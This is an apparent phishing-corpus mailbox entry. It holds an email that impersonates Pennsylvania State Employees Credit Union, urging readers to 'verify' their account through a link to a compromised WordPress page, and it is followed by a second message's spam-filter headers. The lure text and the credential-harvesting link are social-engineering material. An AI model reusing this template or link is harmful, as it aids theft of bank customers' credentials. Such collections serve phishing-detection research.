From: "PSECU" <support@psecu.com>
Date: Sun, 27 Oct 2019 14:29:39 -0400
Message-Id: <20191027182943.32C506C213C@smtp1.caltech.edu>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 207

You will not see this in a MIME-aware mail reader.
--===============1521838012==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Dear Customer,
 Pennsylvania State Employees Credit Union is carrying out a fraud preventi=
on exercise on all accounts
 to reduce and prevent fraud on our online system. All verified account wil=
l recieve a special anti-fraud protection. Which will reduce all risk of on=
line fraud =

 =

Please click on Verify my account to continue update.
Your account information to the verification process
 WE recommend you to deleted this latter after you verify
 Yours Sincerely
Head of Customer Communications
  =

 =20

--===============1521838012==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><P><FONT face=3DCambria>Dear Customer,</FONT></P>
<P><FONT face=3DCambria><FONT face=3DCambria><FONT face=3DCambria>Pennsylva=
nia State Employees Credit Union</FONT></FONT> is carrying out a fraud prev=
ention exercise on all accounts</FONT></P>
<P><FONT face=3DCambria>to reduce and prevent fraud on our online system. A=
ll verified account will recieve a special anti-fraud protection. Which wil=
l reduce all risk of online fraud </FONT></P>
<P><BR><FONT face=3DCambria>Please click on <U><A href=3D"http://polturkmam=
a.pl/wordpress/wp-content/plugins/color/PSECU.asp.html"><FONT color=3D#0080=
c0>Verify my account</FONT></A></U> to continue update.<BR>Your account inf=
ormation to the verification process</FONT></P>
<P><FONT face=3DCambria>WE recommend you to deleted this latter after you v=
erify</FONT></P>
<P><FONT face=3DCambria>Yours Sincerely<BR>Head of Customer Communications<=
/FONT></P>
<P><FONT face=3DCambria></FONT>&nbsp;</P>
<P><FONT face=3DCambria></FONT>&nbsp;</P></html>
--===============1521838012==--

From jose@monkey.org Mon Oct 28 05:02:52 2019 +0000
Return-Path: psecu@email.psecu.com
Delivered-To: jose@monkey.org
X-FDA: 76091998584.36.sound49_8d7f92b342512
X-Spam-Summary: 88,8.5,0,3926c4da9a63c3f8,d41d8cd98f00b204,psecu@email.psecu.com,:psecu@email.psecu.com,RULES_HIT:41:72:355:379:962:967:969:973:978:979:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1394:1395:1431:1436:1437:1516:1517:1518:1534:1541:1568:1575:1588:1592:1594:1711:1714:1730:1777:1792:1803:2194:2199:2525:2560:2563:2610:2682:2685:2693:2741:2859:2890:2892:2895:2897:2898:2915:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3622:3690:3740:3865:3866:3867:3868:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4250:4383:5007:6261:6678:6684:6687:7903:8518:9025:9388:9873:9908:10011:10049:10214:10240:10346:10400:11529:11658:11914:12043:12075:12077:12297:12551:12561:12763:12776:12903:13110:13116:13132:13163:13229:13231:13237:13439:14037:14096:14106:14181:14721:14828:14849:14985:21080:21433:21450:21451:21554:21627:21838:21939:30001:30026:30045:30054:30069:30070:30075,0,RBL:131.215.239.37:@email.psecu.com:.lbl8.mailsh
X-HE-Tag: sound49_8d7f92b342512
X-Filterd-Recvd-Size: 3020
Received: from smtp.caltech.edu (smtp1.caltech.edu [131.215.239.37])
	by imf07.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 28 Oct 2019 05:02:52 +0000 (UTC)
Received: from smtp01.caltech.edu (localhost [127.0.0.1])
	by smtp1.caltech.edu (Postfix) with ESMTP id 650526C4107;
	Sun, 27 Oct 2019 22:02:51 -0700 (PDT)
X-Spam-Scanned: at Caltech-IMSS on smtp01.caltech.edu by amavisd-new
Received: from EC2AMAZ-BNF4K1O.ec2.internal (dhcp-138-233.caltech.edu [131.215.138.233])
	by smtp1.caltech.edu (Postfix) with ESMTP id 4FFAE6C4076;
	Sun, 27 Oct 2019 22:02:38 -0700 (PDT)
Content-Type: multipart/alternative; boundary="===============0850095563=="
MIME-Version: 1.0
Subject: PSECU Security Assistance
To: Recipients <psecu@email.psecu.com>
